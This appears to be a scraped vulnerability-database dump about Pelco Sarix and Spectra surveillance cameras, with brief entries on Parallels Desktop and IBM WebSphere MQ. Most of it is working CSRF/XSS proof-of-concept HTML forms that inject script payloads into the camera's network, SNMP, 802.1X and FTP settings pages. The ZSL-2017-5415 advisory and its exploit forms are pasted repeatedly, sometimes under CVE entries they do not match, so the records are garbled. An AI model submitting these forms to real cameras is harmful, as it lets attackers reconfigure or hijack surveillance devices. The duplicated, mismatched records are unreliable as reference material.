CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201803-1843 | CVE-2018-7236 | Schneider Electric Pelco Sarix Professional Authentication vulnerability |
CVSS V2: 5.8 CVSS V3: 8.1 Severity: HIGH |
A vulnerability exists in Schneider Electric's Pelco Sarix Professional in all firmware versions prior to 3.29.67 which could enable SSH service due to lack of authentication for /login/bin/set_param could enable SSH service. Schneider Electric Pelco Sarix Professional Contains an authentication vulnerability.Information may be obtained and information may be altered. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectricPelcoSarixProfessional is a video surveillance device from Schneider Electric, France. A security vulnerability exists in SchneiderElectricPelcoSarixProfessional with firmware prior to 3.29.67, which was caused by a program failing to authenticate to /login/bin/set_param. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0.
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. SarixaC/ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP-TLS" />
<input type="hidden" name="inner_auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous_id" value=" " />
<input type="hidden" name="ca_certificate" value="test" />
<input type="hidden" name="client_certificate" value="test" />
<input type="hidden" name="private_key" value="test" />
<input type="hidden" name="private_key_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201905-1041 | CVE-2018-7829 | Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Vulnerable to improper neutralization of special elements in data query logic |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
An Improper Neutralization of Special Elements in Query vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which allows an attacker to execute arbitrary system commands. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Contains a vulnerability in improper neutralization of special elements of data query logic.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. Security vulnerabilities exist in SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0.
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. SarixaC/ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP-TLS" />
<input type="hidden" name="inner_auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous_id" value=" " />
<input type="hidden" name="ca_certificate" value="test" />
<input type="hidden" name="client_certificate" value="test" />
<input type="hidden" name="private_key" value="test" />
<input type="hidden" name="private_key_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201707-1351 | No CVE | Parallels Desktop Virtual Machine Privilege Escalation Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Parallels Desktop is the most powerful virtual machine software for Mac computers.
Parallels Desktop has a local privilege elevation vulnerability that allows an attacker to use the vulnerability to escape to the host host to execute arbitrary code.
| VAR-201707-0666 | CVE-2017-1285 | IBM WebSphere MQ Vulnerable to sending crafted messages |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: Medium |
IBM WebSphere MQ 9.0.1 and 9.0.2 could allow an authenticated user with authority to send a specially crafted message that would cause a channel to remain in a running state but not process messages. IBM X-Force ID: 125146. Multiple IBM Products are prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause denial-of-service condition
| VAR-201905-1050 | CVE-2018-7826 | Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Command injection vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0.
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. SarixaC/ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP-TLS" />
<input type="hidden" name="inner_auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous_id" value=" " />
<input type="hidden" name="ca_certificate" value="test" />
<input type="hidden" name="client_certificate" value="test" />
<input type="hidden" name="private_key" value="test" />
<input type="hidden" name="private_key_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201905-1022 | CVE-2018-7816 | Pelco Sarix Enhanced Camera Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 5.5 CVSS V3: 6.5 Severity: MEDIUM |
A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file. Pelco Sarix Enhanced Camera Contains vulnerabilities related to authorization, permissions, and access control.Information may be tampered with. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the lack of effective permissions and access control measures for network systems or products. An attacker could exploit the vulnerability to cause a system denial of service. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0.
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. SarixaC/ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP-TLS" />
<input type="hidden" name="inner_auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
